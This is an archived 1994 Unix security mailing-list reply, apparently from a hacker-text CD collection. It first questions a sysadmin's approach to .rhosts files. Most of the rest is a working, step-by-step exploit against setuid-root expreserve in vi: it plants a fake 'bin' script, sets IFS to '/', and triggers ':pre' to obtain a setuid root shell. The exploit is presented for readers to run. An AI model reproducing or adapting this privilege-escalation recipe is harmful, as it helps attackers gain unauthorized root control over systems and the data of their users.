home *** CD-ROM | disk | FTP | other *** search
/ The Hacker's Encyclopedia 1998 / hackers_encyclopedia.iso / hacking / unix / sol_expr.asc / text0000.txt < prev   
Encoding:
Text File  |  2003-06-11  |  1.2 KB  |  42 lines
  1. On Sat, 15 Oct 1994, James Seng wrote:
  2.  
  3. > Anyway, what i did on my system is put a .rhosts file in every user
  4. > directory. chmod 000 .rhosts and chown root .rhosts. Not all user needs
  5. > .rhosts file. Those who wants to use them email me and i will chown back
  6. > to them. (any problem with that? :-)
  7. >
  8. > James Seng Ching Hong ~{W/Uq:j~}
  9. > Technet Student Consultant, Technet Unit
  10. > Internet: jseng@solomon.technet.sg
  11.  
  12. If the users own their home directories, then what prevents them from
  13. removing that file?
  14.   Oh, I detect an OS-dependent feature here...
  15.  
  16. ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
  17.   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
  18.   with 'system()'.  So, do the following:
  19.     % cd /tmp
  20.     % cp /bin/sh fubar
  21.     % cat > bin
  22.     chmod 4755 fubar
  23.     ^D
  24.     % chmod u+x fubar
  25.     % setenv IFS=/
  26.     % vi
  27.     :pre
  28.     :q
  29.     % fubar
  30.     #
  31.   Some versions of expreserve don't have the hole.
  32.   Some versions of vi don't have the :pre command.
  33.   One does not imply the other.
  34.  
  35. Argh.  Am I repeating 8lgm material here?
  36. --
  37. Charles Howes -- chowes@helix.net
  38.  Always tell the truth, then you make it the other bloke's problem!
  39.  - Sean Connery, 1971
  40.  
  41.  
  42.